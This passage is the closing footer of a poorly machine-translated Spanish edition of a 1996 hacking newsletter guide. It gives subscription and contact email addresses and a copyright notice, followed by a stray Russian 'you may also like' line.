Para suscribirse a la lista Happy Hacker, correo electrnico
hacker@techbroker.com con messge "subscribe hh." Envame correo electrnico
confidencial (por favor, no hay discusin de actividades ilegales) utilizan
cmeinel@techbroker.com. Por favor, llamas directas a
dev/null@techbroker.com. Piratera feliz!
Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUA
PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al
final ..
________________________________________________________

Вам также может понравиться